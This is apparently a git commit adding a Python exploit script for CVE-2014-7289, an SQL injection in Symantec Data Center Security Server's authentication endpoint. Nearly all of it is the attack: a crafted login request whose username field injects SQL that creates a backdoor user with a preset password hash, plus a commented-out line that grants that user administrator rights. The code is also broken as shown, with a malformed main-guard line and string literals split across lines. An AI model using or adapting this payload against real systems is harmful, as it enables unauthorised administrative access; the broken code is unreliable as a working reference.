sqli exploit example forCVE-2014-7289

2025-04-26 10:39:08 -04:00 · 2015-01-23 12:48:27 -08:00 · 2015-01-23 12:48:27 -08:00 · 94edfc7bb0
commit 94edfc7bb0
parent 3b64acb80e
1 changed files with 43 additions and 0 deletions
--- a/Web_Security/SQLi/CVE-2014-7289_exploit.py
+++ b/Web_Security/SQLi/CVE-2014-7289_exploit.py
@ -0,0 +1,43 @@
+#!/bin/env python
+# Reference: http://seclists.org/fulldisclosure/2015/Jan/91
+
+
+import httplib
+def send_request(host,data):
+        params = data
+        headers = {"AppFire-Format-Version": "1.0",
+                   "AppFire-Charset": "UTF-16LE",
+                   "Content-Type":"application/x-appfire",
+                   "User-Agent":"Java/1.7.0_45",
+                   }
+        conn = httplib.HTTPSConnection(host)
+        conn.request("POST", "/sis-ui/authenticate", params, headers)
+        response = conn.getresponse()
+        data=response.read()
+        conn.close()    
+        return response,data
+
+if __name__ = '__main__'
+        header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
+        data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
+        PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
+        PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
+        VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
+        '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
+        07:13:23', '1', '0', '0',
+        'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
+        -- '' " # add user to USR table
+        #data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
+        ROLERID) VALUES (1504, 1); -- " # add user to admin group
+        data+="\r\nan=Symantec Data Center Security Server
+        6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
+        data = data.encode('utf-16le')
+        
+        eof_flag="\nEOF_FLAG\n"
+        header = header %(len(data))
+        payload=header+data+eof_flag
+        
+        response,data = send_request("<host>:4443",payload)
+        
+        print data.decode('utf-16le')
+        print response.status